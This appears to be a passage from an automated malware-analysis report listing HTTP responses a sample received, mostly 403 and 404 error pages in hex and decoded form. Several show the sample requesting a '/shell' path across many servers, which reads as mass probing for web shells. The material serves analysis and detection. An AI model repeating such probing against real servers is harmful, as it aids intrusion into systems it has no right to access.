left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">403</h1><h2 style="margin-top:20px;font-size: 30px;">Forbidde
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 87Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:25 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:07:27 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:27 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Tue, 19 Jul 2022 11:07:27 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Tue, 19 Jul 2022 11:07:30 GMTContent-Length: 113Data Raw: 4f 20 72 65 63 75 72 73 6f 20 64 65 20 71 75 65 20 65 73 74 c3 a1 20 c3 a0 20 70 72 6f 63 75 72 61 20 66 6f 69 20 72 65 6d 6f 76 69 64 6f 2c 20 72 65 63 65 62 65 75 20 75 6d 20 6e 6f 6d 65 20 64 69 66 65 72 65 6e 74 65 20 6f 75 20 65 73 74 c3 a1 20 74 65 6d 70 6f 72 61 72 69 61 6d 65 6e 74 65 20 69 6e 64 69 73 70 6f 6e c3 ad 76 65 6c 2e Data Ascii: O recurso de que est procura foi removido, recebeu um nome diferente ou est temporariamente indisponvel.
      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailable: Back-end server is at capacityContent-Length: 0Connection: Close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 14:08:16 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 14:08:56 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:07:31 GMTServer: ApacheAccept-Ranges: bytesContent-Length: 955Keep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 34 20 2d 20 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 34 20 2d 20 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 09 44 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 65 78 69 73 74 69 65 72 74 20 6e 69 63 68 74 20 6f 64 65 72 20 73 74 65 68 74 20 74 65 6d 70 6f 72 c3 a4 72 20 6e 69 63 68 74 20 7a 75 72 20 56 65 72 66 c3 bc 67 75 6e 67 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 09 42 69 74 74 65 20 76 65 72 73 75 63 68 65 6e 20 53 69 65 20 65 73 20 73 70 c3 a4 74 65 72 20 6e 6f 63 68 20 65 69 6e 6d 61 6c 20 6f 64 65 72 20 72 75 66 65 6e 20 53 69 65 20 64 69 65 20 53 74 61 72 74 73 65 69 74 65 20 64 65 72 20 67 65 77 c3 bc 6e 73 63 68 74 65 6e 20 44 6f 6d 61 69 6e 20 61 75 66 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:31 GMTContent-Type: text/htmlContent-Length: 343Connection: keep-aliveVary: Accept-EncodingETag: "62c68320-157"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 19 Jul 2022 11:07:33 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3 (Ubuntu)Date: Tue, 19 Jul 2022 11:07:33 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveVary: Accept-EncodingStrict-Transport-Security: max-age=15768000Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 11:07:33 GMTServer: ApacheContent-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 19 Jul 2022 11:07:33 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 17:12:47 GMTServer: webserverContent-Length: 181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 73 68 65 6c 6c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /shell</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 19 Jul 2022 11:07:39 GMTServer: ApacheContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Tue, 19 Jul 2022 11:07:49 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 07:00:22 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 19 Jul 2022 11:07:39 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Jul 2022 17:12:53 GMTServer: webserverContent-Length: 181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 73 68 65 6c 6c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /shell</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Length: 109Date: Tue, 19 Jul 2022 11:07:41 GMTExpires: 0Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 404: Not Found</title></head><body><h1>Error 404: Not Found</h1></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 19 Jul 2022 11:07:42 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
